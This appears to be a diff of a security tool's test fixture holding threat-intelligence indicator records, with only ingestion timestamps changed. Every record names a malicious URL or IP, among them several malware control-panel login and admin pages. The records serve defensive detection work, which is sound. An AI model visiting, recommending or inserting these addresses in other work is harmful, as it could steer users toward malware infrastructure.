@@ -1150,7 +1150,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022699300Z", + "ingested": "2021-12-14T14:57:43.118163250Z", "original": "{\"created\":\"2020-01-22T03:00:45.787Z\",\"description\":\"TS ID: 55241332309; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--aff7b07f-acc7-4bec-ab19-1fce972bfd09\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-01-22T03:00:45.787Z\",\"name\":\"mal_url: http://worldatdoor.in/panel2/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://worldatdoor.in/panel2/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:45.787Z\"}", "category": "threat", "type": "indicator", @@ -1202,7 +1202,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022706200Z", + "ingested": "2021-12-14T14:57:43.118163745Z", "original": "{\"created\":\"2020-01-22T03:00:45.841Z\",\"description\":\"TS ID: 55241332286; iType: mal_url; State: active; Org: Garanntor-Hosting; Source: CyberCrime\",\"id\":\"indicator--ba71ba3a-1efd-40da-ab0d-f4397d6fc337\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-22T03:00:45.841Z\",\"name\":\"mal_url: http://smartlinktelecom.top/kings/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://smartlinktelecom.top/kings/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:45.841Z\"}", "category": "threat", "type": "indicator", 
@@ -1254,7 +1254,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022711900Z", + "ingested": "2021-12-14T14:57:43.118164141Z", "original": "{\"created\":\"2020-01-22T03:00:45.959Z\",\"description\":\"TS ID: 55241332339; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--17777e7f-3e91-4446-a43d-79139de8a948\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-64\"],\"modified\":\"2020-01-22T03:00:45.959Z\",\"name\":\"mal_url: http://carirero.net/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://carirero.net/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:45.959Z\"}", "category": "threat", "type": "indicator", @@ -1299,7 +1299,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022719600Z", + "ingested": "2021-12-14T14:57:43.118164643Z", "original": "{\"created\":\"2020-01-22T03:00:46.025Z\",\"description\":\"TS ID: 55241332319; iType: mal_ip; State: active; Org: SoftLayer Technologies; Source: CyberCrime\",\"id\":\"indicator--f6be1804-cfe4-4f41-9338-2b65f5b1dda1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-30\"],\"modified\":\"2020-01-22T03:00:46.025Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:46.025Z\"}", "category": "threat", "type": "indicator", 
@@ -1350,7 +1350,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022727Z", + "ingested": "2021-12-14T14:57:43.118165162Z", "original": "{\"created\":\"2020-01-22T03:00:57.729Z\",\"description\":\"TS ID: 55241332305; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--b4fd8489-9589-4f70-996c-84989245a21b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-43\"],\"modified\":\"2020-01-22T03:00:57.729Z\",\"name\":\"mal_url: http://tuu.nu/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tuu.nu/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:00:57.729Z\"}", "category": "threat", "type": "indicator", @@ -1402,7 +1402,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022734400Z", + "ingested": "2021-12-14T14:57:43.118165546Z", "original": "{\"created\":\"2020-01-22T03:01:02.696Z\",\"description\":\"TS ID: 55241332346; iType: mal_url; State: active; Org: Ifx Networks Colombia; Source: CyberCrime\",\"id\":\"indicator--bc50c62f-a015-4460-87df-2137626877e3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-36\"],\"modified\":\"2020-01-22T03:01:02.696Z\",\"name\":\"mal_url: http://dulfix.com/cgi-bins/dulfix/gustav57/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dulfix.com/cgi-bins/dulfix/gustav57/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:01:02.696Z\"}", "category": "threat", "type": "indicator", 
@@ -1454,7 +1454,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022741900Z", + "ingested": "2021-12-14T14:57:43.118165946Z", "original": "{\"created\":\"2020-01-22T03:01:02.807Z\",\"description\":\"TS ID: 55241332323; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--2765af4b-bfb7-4ac8-82d2-ab6ed8a52461\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-65\"],\"modified\":\"2020-01-22T03:01:02.807Z\",\"name\":\"mal_url: http://deliciasdvally.com.pe/includes/gter/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://deliciasdvally.com.pe/includes/gter/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:01:02.807Z\"}", "category": "threat", "type": "indicator", @@ -1506,7 +1506,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022749200Z", + "ingested": "2021-12-14T14:57:43.118166459Z", "original": "{\"created\":\"2020-01-22T03:01:24.81Z\",\"description\":\"TS ID: 55241332399; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--9c0e63a1-c32a-470a-bf09-51488e239c63\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-22T03:01:24.81Z\",\"name\":\"mal_url: http://nkpotu.xyz/Kpot1/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nkpotu.xyz/Kpot1/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:01:24.81Z\"}", "category": "threat", "type": "indicator", 
@@ -1551,7 +1551,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022756600Z", + "ingested": "2021-12-14T14:57:43.118166926Z", "original": "{\"created\":\"2020-01-22T03:01:41.158Z\",\"description\":\"TS ID: 55241332328; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime\",\"id\":\"indicator--8047678e-20be-4116-9bc4-7bb7c26554e0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-22T03:01:41.158Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:01:41.158Z\"}", "category": "threat", "type": "indicator", @@ -1603,7 +1603,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022764Z", + "ingested": "2021-12-14T14:57:43.118167313Z", "original": "{\"created\":\"2020-01-22T03:01:57.189Z\",\"description\":\"TS ID: 55241332377; iType: mal_url; State: active; Org: A100 ROW GmbH; Source: CyberCrime\",\"id\":\"indicator--c57a880c-1ce0-45de-9bab-fb2910454a61\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-01-22T03:01:57.189Z\",\"name\":\"mal_url: http://35.158.92.3/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://35.158.92.3/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:01:57.189Z\"}", "category": "threat", "type": "indicator", 
@@ -1648,7 +1648,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022771300Z", + "ingested": "2021-12-14T14:57:43.118167775Z", "original": "{\"created\":\"2020-01-22T03:01:57.279Z\",\"description\":\"TS ID: 55241332101; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--6056152c-0fa5-4e34-871a-3c8990f1ee46\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-42\"],\"modified\":\"2020-01-22T03:01:57.279Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:01:57.279Z\"}", "category": "threat", "type": "indicator", @@ -1700,7 +1700,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022775800Z", + "ingested": "2021-12-14T14:57:43.118168266Z", "original": "{\"created\":\"2020-01-22T03:02:50.57Z\",\"description\":\"TS ID: 55241332357; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--23215acb-4989-4434-ac6d-8f9367734f0f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-22T03:02:50.57Z\",\"name\":\"mal_url: http://chol.cc/Work7/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://chol.cc/Work7/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:02:50.57Z\"}", "category": "threat", "type": "indicator", 
@@ -1751,7 +1751,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022780400Z", + "ingested": "2021-12-14T14:57:43.118169190Z", "original": "{\"created\":\"2020-01-22T03:02:52.496Z\",\"description\":\"TS ID: 55241332289; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--452ece92-9ff2-4f99-8a7f-fd614ebea8cf\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-26\"],\"modified\":\"2020-01-22T03:02:52.496Z\",\"name\":\"mal_url: http://f0391600.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391600.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:02:52.496Z\"}", "category": "threat", "type": "indicator", @@ -1803,7 +1803,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022784800Z", + "ingested": "2021-12-14T14:57:43.118169601Z", "original": "{\"created\":\"2020-01-22T03:03:42.819Z\",\"description\":\"TS ID: 55241332334; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--10958d74-ec60-41af-a1ab-1613257e670f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-01-22T03:03:42.819Z\",\"name\":\"mal_url: http://extraclick.space/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://extraclick.space/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:03:42.819Z\"}", "category": "threat", "type": "indicator", 
@@ -1855,7 +1855,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022790300Z", + "ingested": "2021-12-14T14:57:43.118170109Z", "original": "{\"created\":\"2020-01-22T03:03:52.044Z\",\"description\":\"TS ID: 55241332326; iType: mal_url; State: active; Org: RUCloud; Source: CyberCrime\",\"id\":\"indicator--19556daa-6293-400d-8706-d0baa6b16b7a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-22T03:03:52.044Z\",\"name\":\"mal_url: http://petrogarmani.pw/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://petrogarmani.pw/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:03:52.044Z\"}", "category": "threat", "type": "indicator", @@ -1907,7 +1907,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022794500Z", + "ingested": "2021-12-14T14:57:43.118170552Z", "original": "{\"created\":\"2020-01-22T03:04:01.65Z\",\"description\":\"TS ID: 55241332311; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--b09d9be9-6703-4a7d-a066-2baebb6418fc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-01-22T03:04:01.65Z\",\"name\":\"mal_url: http://worldatdoor.in/mighty/32/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://worldatdoor.in/mighty/32/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:04:01.65Z\"}", "category": "threat", "type": "indicator", 
@@ -1958,7 +1958,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022798700Z", + "ingested": "2021-12-14T14:57:43.118170982Z", "original": "{\"created\":\"2020-01-22T03:04:32.717Z\",\"description\":\"TS ID: 55241332341; iType: mal_url; State: active; Org: Institute of Philosophy, Russian Academy of Scienc; Source: CyberCrime\",\"id\":\"indicator--43febf7d-4185-4a12-a868-e7be690b14aa\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-01-22T03:04:32.717Z\",\"name\":\"mal_url: http://zanlma.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://zanlma.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:04:32.717Z\"}", "category": "threat", "type": "indicator", @@ -2009,7 +2009,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022802600Z", + "ingested": "2021-12-14T14:57:43.118171474Z", "original": "{\"created\":\"2020-01-22T03:04:56.858Z\",\"description\":\"TS ID: 55241332303; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--a34728e6-f91d-47e6-a4d8-a69176299e45\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-01-22T03:04:56.858Z\",\"name\":\"mal_url: http://f0369688.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0369688.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:04:56.858Z\"}", "category": "threat", "type": "indicator", 
@@ -2061,7 +2061,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022806800Z", + "ingested": "2021-12-14T14:57:43.118171950Z", "original": "{\"created\":\"2020-01-22T03:04:59.245Z\",\"description\":\"TS ID: 55241332380; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--ac821704-5eb2-4f8f-a8b6-2a168dbd0e54\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-22T03:04:59.245Z\",\"name\":\"mal_url: http://chol.cc/Work2/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://chol.cc/Work2/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:04:59.245Z\"}", "category": "threat", "type": "indicator", @@ -2106,7 +2106,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022812200Z", + "ingested": "2021-12-14T14:57:43.118172340Z", "original": "{\"created\":\"2020-01-23T03:00:22.287Z\",\"description\":\"TS ID: 55245868747; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--0d3e1bd8-0f16-4c22-b8a1-663ec255ad79\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-57\"],\"modified\":\"2020-01-23T03:00:22.287Z\",\"name\":\"mal_ip: 192.168.214.199\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '192.168.214.199']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:00:22.287Z\"}", "category": "threat", "type": "indicator", 
@@ -2158,7 +2158,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022816900Z", + "ingested": "2021-12-14T14:57:43.118172751Z", "original": "{\"created\":\"2020-01-23T03:01:11.329Z\",\"description\":\"TS ID: 55245868770; iType: mal_url; State: active; Org: Mills College; Source: CyberCrime\",\"id\":\"indicator--2cdd130a-c884-402d-b63c-e03f9448f5d9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-24\"],\"modified\":\"2020-01-23T03:01:11.329Z\",\"name\":\"mal_url: http://softtouchcollars.com/Loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://softtouchcollars.com/Loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:01:11.329Z\"}", "category": "threat", "type": "indicator", @@ -2210,7 +2210,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022821500Z", + "ingested": "2021-12-14T14:57:43.118173248Z", "original": "{\"created\":\"2020-01-23T03:01:36.682Z\",\"description\":\"TS ID: 55245868769; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--88e98e13-4bfd-4188-941a-f696a7b86b71\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-01-23T03:01:36.682Z\",\"name\":\"mal_url: http://imobiliariatirol.com/gh/panelnew/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://imobiliariatirol.com/gh/panelnew/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:01:36.682Z\"}", "category": "threat", "type": "indicator", 
@@ -2262,7 +2262,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022825600Z", + "ingested": "2021-12-14T14:57:43.118173686Z", "original": "{\"created\":\"2020-01-23T03:02:15.854Z\",\"description\":\"TS ID: 55245868772; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--27323b7d-85d3-4e89-8249-b7696925a772\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-23T03:02:15.854Z\",\"name\":\"mal_url: http://deliveryexpressworld.xyz/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://deliveryexpressworld.xyz/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:02:15.854Z\"}", "category": "threat", "type": "indicator", @@ -2313,7 +2313,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022829900Z", + "ingested": "2021-12-14T14:57:43.118174121Z", "original": "{\"created\":\"2020-01-23T03:02:47.364Z\",\"description\":\"TS ID: 55245868766; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--b0639721-de55-48c6-b237-3859d61aecfb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-01-23T03:02:47.364Z\",\"name\":\"mal_url: http://f0392261.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0392261.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:02:47.364Z\"}", "category": "threat", "type": "indicator", 
@@ -2365,7 +2365,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022835500Z", + "ingested": "2021-12-14T14:57:43.118174764Z", "original": "{\"created\":\"2020-01-23T03:03:05.048Z\",\"description\":\"TS ID: 55245868749; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--677e714d-c237-42a1-b6b7-9145acd13eee\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-01-23T03:03:05.048Z\",\"name\":\"mal_url: http://89.160.20.156/panel/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/panel/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:03:05.048Z\"}", "category": "threat", "type": "indicator", @@ -2417,7 +2417,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022843300Z", + "ingested": "2021-12-14T14:57:43.118175290Z", "original": "{\"created\":\"2020-01-23T03:03:15.734Z\",\"description\":\"TS ID: 55245868767; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--5baa1dbd-d74e-408c-92b5-0a9f97e4b87a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-01-23T03:03:15.734Z\",\"name\":\"mal_url: http://f0387404.xsph.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0387404.xsph.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:03:15.734Z\"}", "category": "threat", "type": "indicator", 
@@ -2469,7 +2469,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022850800Z", + "ingested": "2021-12-14T14:57:43.118175781Z", "original": "{\"created\":\"2020-01-23T03:03:42.599Z\",\"description\":\"TS ID: 55245868768; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--4563241e-5d2f-41a7-adb9-3925a5eeb1b1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-01-23T03:03:42.599Z\",\"name\":\"mal_url: http://a0386457.xsph.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://a0386457.xsph.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:03:42.599Z\"}", "category": "threat", "type": "indicator", @@ -2521,7 +2521,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022858400Z", + "ingested": "2021-12-14T14:57:43.118176171Z", "original": "{\"created\":\"2020-01-24T02:57:04.821Z\",\"description\":\"TS ID: 55250078037; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--70cb5d42-91d3-4efe-8c47-995fc0ac4141\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-24T02:57:04.821Z\",\"name\":\"mal_url: http://defenseisrael.com/dis/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://defenseisrael.com/dis/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:04.821Z\"}", "category": "threat", "type": "indicator", 
@@ -2566,7 +2566,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022866100Z", + "ingested": "2021-12-14T14:57:43.118176780Z", "original": "{\"created\":\"2020-01-24T02:57:04.857Z\",\"description\":\"TS ID: 55250078030; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime\",\"id\":\"indicator--3aa712bb-b5d4-4632-bf50-48a4aeeaeb6d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-24T02:57:04.857Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:04.857Z\"}", "category": "threat", "type": "indicator", @@ -2617,7 +2617,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022873500Z", + "ingested": "2021-12-14T14:57:43.118177230Z", "original": "{\"created\":\"2020-01-24T02:57:04.883Z\",\"description\":\"TS ID: 55250078019; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--64227c7d-86ea-4146-a868-3decb5aa5f1d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-01-24T02:57:04.883Z\",\"name\":\"mal_url: http://lbfb3f03.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://lbfb3f03.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:04.883Z\"}", "category": "threat", "type": "indicator", 
@@ -2669,7 +2669,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022881Z", + "ingested": "2021-12-14T14:57:43.118177668Z", "original": "{\"created\":\"2020-01-24T02:57:12.997Z\",\"description\":\"TS ID: 55250078035; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--37fcf9a7-1a90-4d81-be0a-e824a4fa938e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-24T02:57:12.997Z\",\"name\":\"mal_url: http://byedtronchgroup.yt/jik/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://byedtronchgroup.yt/jik/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:12.997Z\"}", "category": "threat", "type": "indicator", @@ -2721,7 +2721,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022886400Z", + "ingested": "2021-12-14T14:57:43.118178161Z", "original": "{\"created\":\"2020-01-24T02:57:13.025Z\",\"description\":\"TS ID: 55250078008; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--5a38786f-107e-4060-a7c9-ea8a5ded6aac\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-24T02:57:13.025Z\",\"name\":\"mal_url: http://199.192.168.11/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://199.192.168.11/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:13.025Z\"}", "category": "threat", "type": "indicator", 
